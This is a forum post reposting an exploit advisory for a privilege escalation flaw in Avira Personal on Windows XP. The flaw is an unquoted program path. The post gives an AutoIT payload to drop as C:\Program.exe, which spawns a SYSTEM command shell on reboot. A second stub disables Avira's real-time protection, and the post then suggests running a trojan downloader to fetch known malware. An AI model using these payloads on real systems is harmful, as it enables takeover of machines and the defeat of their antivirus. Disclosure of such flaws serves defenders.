Jump to content
Nytro

Avira Personal Privilege Escalation Vulnerability

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=2]Avira Personal Privilege Escalation Vulnerability[/h]

============================================
Tested on OS:
Microsoft Windows XP Professional 5.1.2600 Service Pack 2  2600
============================================
Vulnerable Software: Avira Personal
Tested version of Avira:
============================================
Product version 10.2.0.719 25.10.2012
Search engine 8.02.12.38 07.05.2013
Virus definition file 7.11.77.54 08.05.2013
Control Center 10.00.12.31 21.07.2011
Config Center 10.00.13.20 21.07.2011
Luke Filewalker 10.03.00.07 21.07.2011
AntiVir Guard 10.00.01.59 21.07.2011
Filter 10.00.26.09 21.07.2011
AntiVir WebGuard 10.01.09.00 09.05.2011
Scheduler 10.00.00.21 21.04.2011
Updater 10.00.00.39 21.07.2011
============================================
Vulnerability: Privilegie Escalation
============================================


Proof Of concept:
If the attacker somehow manages upload any malicious files to root directory of OS installed disk (%homedrive%) in the following manner:
C:\Program.exe
(In example attacker is limited to execute any file from webserver but is able upload any file to %homedrive%\ )

On next reboot this can be used to escalate privileges to NT_AUTHORITY/SYSTEM due vulnerability in Avira Personal(if that machine uses Avira Personal).
============================================
The main trouble begins from here:

http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425%28v=vs.85%29.aspx

Parameters

lpApplicationName [in, optional]

        c:\program.exe files\sub dir\program name
        c:\program files\sub.exe dir\program name
        c:\program files\sub dir\program.exe name
        c:\program files\sub dir\program name.exe

============================================



For this purposes i have used the following AutoIT script (then compiled it to 32 bit win32 binary)


While 1
  sleep(18000);//sleep for 18 seconds for fun
  MsgBox(64,"","Blah!" & @CRLF & "Woot: We got=>  " & @UserName);//display the current user
  ShellExecute("cmd.exe");//launch cmd.exe
   ;Enjoy
WEnd

and uploaded it as Program.exe to  C:\

Then simply rebooted machine.


Here is result on next reboot:

See escal1.PNG
http://i052.radikal.ru/1305/69/7bb1ce0323ec.png

http://s56.radikal.ru/i152/1305/03/10bc43883c89.png

In eg: this vuln can be used in the following situations:

http://packetstormsecurity.com/files/121168/MiniWeb-File-Upload-Directory-Traversal.html

Attacker is able to upload arbitrary files to system but he/she is unable to execute it.
ON next reboot attacker can escalate privileges to SYSTEM privilegie due vulnerability in Avira Personal.


This is also possible disable Realtime protection(Guard) of Avira personal in the following way on next reboot:


=========================Compile as program.exe and place to %homedrive%\====================
While 1
  sleep(3600*1000);
WEnd
====Start your another troyan downloader and download/execute known malware to Avira==========

# 98CC4E5E757987B4   1337day.com [2013-05-17]   45058B9096F3ABCA #

Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...